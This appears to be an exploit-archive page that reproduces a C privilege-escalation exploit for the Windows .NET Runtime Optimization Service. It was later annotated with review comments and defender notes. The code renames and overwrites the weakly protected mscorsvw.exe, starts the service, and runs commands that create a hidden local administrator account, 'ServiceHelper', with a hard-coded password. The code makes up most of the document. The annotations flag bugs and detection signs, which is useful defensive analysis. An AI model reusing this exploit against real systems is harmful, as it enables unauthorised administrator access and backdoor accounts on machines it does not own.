
.NET Runtime Optimization Service Privilege Escalation Exploit 0day

🗓️ 01 Jul 2014 00:00:00Reported by RootType 

.NET Runtime Optimization Service Privilege Escalation Exploit 0day

Code

                                                /*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <[email protected]>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a

    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/

 xenomuta [at] tuxfamily.org
 xenomuta [at] gmail.com
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

 This one's a no-brainer, plain simple:

 This service's EXE file can be overwritten by any non-admin domain user
 and local power users (which are the default permissions set).
 This exploit compiles to a service that uses the original service's id.

 Tested on Windows 2003, WinXP (sp3) and Win7 
 ( my guess is that it runs on any win box running this service ).

 greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
 
 bless y'all!

*/
#include <stdio.h>
#include <windows.h>

/* Service state shared between main() and ServiceMain(). Both objects have
 * static storage and therefore start zeroed; nothing in this listing assigns
 * hStatus (no RegisterServiceCtrlHandler() call is visible), and only the
 * dwCurrentState/dwWin32ExitCode members of ServiceStatus are ever written. */
SERVICE_STATUS          ServiceStatus;
SERVICE_STATUS_HANDLE   hStatus;

/* Fixed target binary, its short name, the display name passed to "net start"
 * and the service id registered in the dispatcher table. All are pinned to the
 * v2.0.50727 x86 framework location; when that path is absent, rename() in
 * main() fails and the program exits. PWN_SHORT is not referenced in this
 * listing. The weak default ACL on PWN_EXE described in the header is the
 * precondition for everything below; tightening that ACL removes it. */
#define PWN_EXE     "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT   "mscorsvw.exe"
#define PWN_NAME    ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID      "clr_optimization_v2.0.50727_32"

/*
 * Service entry point registered under PWN_ID in main()'s ServiceTable and
 * invoked by the service control manager once the replaced binary is started.
 * Calls InitService() and then publishes the resulting state through the
 * global hStatus/ServiceStatus pair. argc/argv are unused.
 *
 * NOTE(review): InitService() is defined below without a return statement, so
 * the value tested here is unspecified and the branch taken is effectively
 * arbitrary. Its prototype also appears only after this function, so this call
 * is an implicit declaration.
 *
 * NOTE(review): hStatus is never assigned in this listing and ControlHandler()
 * is declared but never defined or registered, so SetServiceStatus() receives a
 * zero handle; its return value is not checked in either branch, and no other
 * SERVICE_STATUS members (service type, accepted controls) are ever set.
 */
void  ServiceMain(int argc, char** argv) {
    if (InitService()) {
       /* Non-zero is treated as failure: report STOPPED with exit code -1. */
       ServiceStatus.dwCurrentState = SERVICE_STOPPED;
       ServiceStatus.dwWin32ExitCode = -1;
       SetServiceStatus(hStatus, &ServiceStatus);
       return;
    }
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;
   SetServiceStatus (hStatus, &ServiceStatus);
}

/* Forward declarations. ControlHandler() is never defined or referenced in this
 * listing; the InitService() prototype is placed after ServiceMain(), which
 * already calls it above. */
void ControlHandler(DWORD request);
int InitService();

/*
 * Program entry. Two roles are distinguished by the current user name:
 *
 *  - Not "SYSTEM" (launched by a user): relies on the weak ACL on PWN_EXE
 *    described in the header. Renames the original binary to "<PWN_EXE>.bak",
 *    copies this executable (argv[0]) over PWN_EXE, prints the credentials it
 *    expects InitService() to create, and starts the service by display name
 *    through "net start" with output discarded.
 *  - In every case: registers ServiceMain under PWN_ID and hands control to
 *    StartServiceCtrlDispatcher(), which is what runs when the service control
 *    manager launches the replaced file.
 *
 * Defender notes, limited to what this listing does: the host-side artefacts
 * are a rename of mscorsvw.exe to a ".bak" sibling, a replaced service binary,
 * a "net start" of the named service from an interactive user context, and
 * (from InitService()) a service-hosted cmd.exe running "net user ... /add" and
 * "net localgroup Administrators ... /add". The root cause is the file ACL on
 * PWN_EXE; restoring a restrictive ACL removes the precondition.
 *
 * NOTE(review): the return values of GetUserName(), malloc(), CopyFile(),
 * system() and StartServiceCtrlDispatcher() are not checked, and str is never
 * freed. If GetUserName() fails, acUserName is left uninitialised and strcmp()
 * reads indeterminate bytes. The "Username/Password" message is printed before
 * the service has run InitService(), so it reports an outcome that has not yet
 * happened and may not happen if "net start" fails. strcmp()/memset()/malloc()/
 * exit() are used without <string.h>/<stdlib.h> being included here -- presumably
 * reached through <windows.h>; confirm with the toolchain.
 */
int main(int argc, char **argv) {
    char acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    GetUserName(acUserName, &nUserName);

    /* Anything other than SYSTEM is taken to mean "not yet running as the
     * service", so the file-replacement step runs. */
    if (strcmp((char *)&acUserName, "SYSTEM")) {
        char *str = (char *)malloc(2048);
        memset(str, 0, 2048);
        snprintf(str, 2048, "%s.bak", PWN_EXE);
        /* rename() failing is the only error that is actually surfaced. */
        if (rename(PWN_EXE, str) != 0) {
           fprintf(stderr, " :(  sorry, can't write to file.\n");
           exit(1);
        }
        /* !0 == bFailIfExists; PWN_EXE was just renamed away, so no collision. */
        CopyFile(argv[0], PWN_EXE, !0);
        snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        system(str);
    }

    /* Dispatcher table: one entry plus the NULL terminator. */
    SERVICE_TABLE_ENTRY ServiceTable[2];

    ServiceTable[0].lpServiceName = PWN_ID;
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
    /* Blocks while the service runs; fails immediately when invoked from a
     * console rather than by the service control manager (result unchecked). */
    StartServiceCtrlDispatcher(ServiceTable);

    return 0;
}

/*
 * Called from ServiceMain() after the service control manager has started the
 * replaced binary, i.e. in the service's own context (presumably SYSTEM, given
 * the user-name check in main()). Shells out to "net user ... /add" followed
 * by "net localgroup Administrators ... /add" with the hard-coded account in
 * the literal below. This is the actual privilege-escalation step, and the
 * command line is the detection signature: a service-hosted cmd.exe spawning
 * net.exe to create a local administrator.
 *
 * NOTE(review): declared as returning int but has no return statement, so the
 * caller's test in ServiceMain() reads an unspecified value; the result of
 * system() is discarded. The two commands are joined with "&", so the second
 * runs regardless of whether the first succeeded.
 */
int InitService() {
    system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}

                              
